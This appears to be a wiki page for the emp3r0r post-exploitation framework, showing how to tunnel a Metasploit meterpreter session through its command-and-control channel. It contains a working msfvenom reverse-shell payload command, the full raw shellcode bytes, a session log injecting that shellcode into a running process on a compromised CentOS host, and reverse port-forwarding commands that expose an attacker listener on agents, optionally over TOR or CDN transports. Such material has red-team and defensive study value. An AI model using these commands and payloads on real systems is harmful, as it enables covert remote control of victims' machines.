-
-
Notifications
You must be signed in to change notification settings - Fork 233
Interoperability with metasploit and other C2 frameworks
Take metasploit as an example, you can easily generate a (staged) shellcode for meterpreter with the following command:
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw -o shellcode.bin
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Saved as: shellcode.bin
Note that we are using 127.0.0.1
as C2 address, this way we can encapsulate meterpreter inside emp3r0r's transport with reverse port mapping.
To format this shellcode for emp3r0r:
$ xxd -i shellcode.bin | grep 0x | tr -d '[:space:]' | tr -d ',' | sed 's/0x/\\x/g' | tee shellcode.txt
\x48\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9\x6a\x22\x41\x5a\xb2\x07\x0f\x05\x48\x85\xc0\x78\x51\x6a\x0a\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00\x11\x5c\x7f\x00\x00\x01\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x59\x48\x85\xc0\x79\x25\x49\xff\xc9\x74\x18\x57\x6a\x23\x58\x6a\x00\x6a\x05\x48\x89\xe7\x48\x31\xf6\x0f\x05\x59\x59\x5f\x48\x85\xc0\x79\xc7\x6a\x3c\x58\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e\x5a\x0f\x05\x48\x85\xc0\x78\xed\xff\xe6
Save shellcode.txt
under /tmp/emp3r0r/www
before using injector module.
2021/01/12 16:27:02
[0] Knock.. Knock...
d5966a56 from 192.168.122.40:51306 - HTTP2 (https://192.168.122.1), running 'CentOS Linux 7 (Core) 7'
emp3r0r > use injector
Using module 'injector'
emp3r0r (injector) > set method native
emp3r0r (injector) > target 0
emp3r0r (injector) > info
Option Value
====== =====
pid 0
method native
module injector
target 0
emp3r0r (injector) > run
2021/01/12 16:27:25 Please wait...
2021/01/12 16:27:25 The shellcode will live in `sleep` process, you will get notified when it exits
2021/01/12 16:38:32
[0] !inject native 0:
native has successfully injected shellcode into target process
emp3r0r (injector) >
Here is a diagram:
metasploit C2 --> emp3r0r C2 ---> agent
metasploit C2's port gets mapped onto agent, thus making it available to every emp3r0r agent under emp3r0r C2's command.
If your emp3r0r C2 is using a different transport such as TOR/CDN, your meterpreter will be using them as well. And those agents who don't have internet access can connect to metasploit C2 via emp3r0r's auto proxy feature.
Assuming metasploit is listening on 192.168.122.87:4444
, and we want it available on agent as 0.0.0.0:4444
emp3r0r (injector) > use port_fwd
Using module 'port_fwd'
emp3r0r (port_fwd) > set switch reverse
emp3r0r (port_fwd) > set to 192.168.122.87:4444
emp3r0r (port_fwd) > set listen_port 4444
emp3r0r (port_fwd) > target 0
emp3r0r (port_fwd) > info
Option Value
====== =====
module port_fwd
target 0
to 192.168.122.87:4444
listen_port 4444
switch reverse
emp3r0r (port_fwd) > run
It's the same process as Run shellcode loader in emp3r0r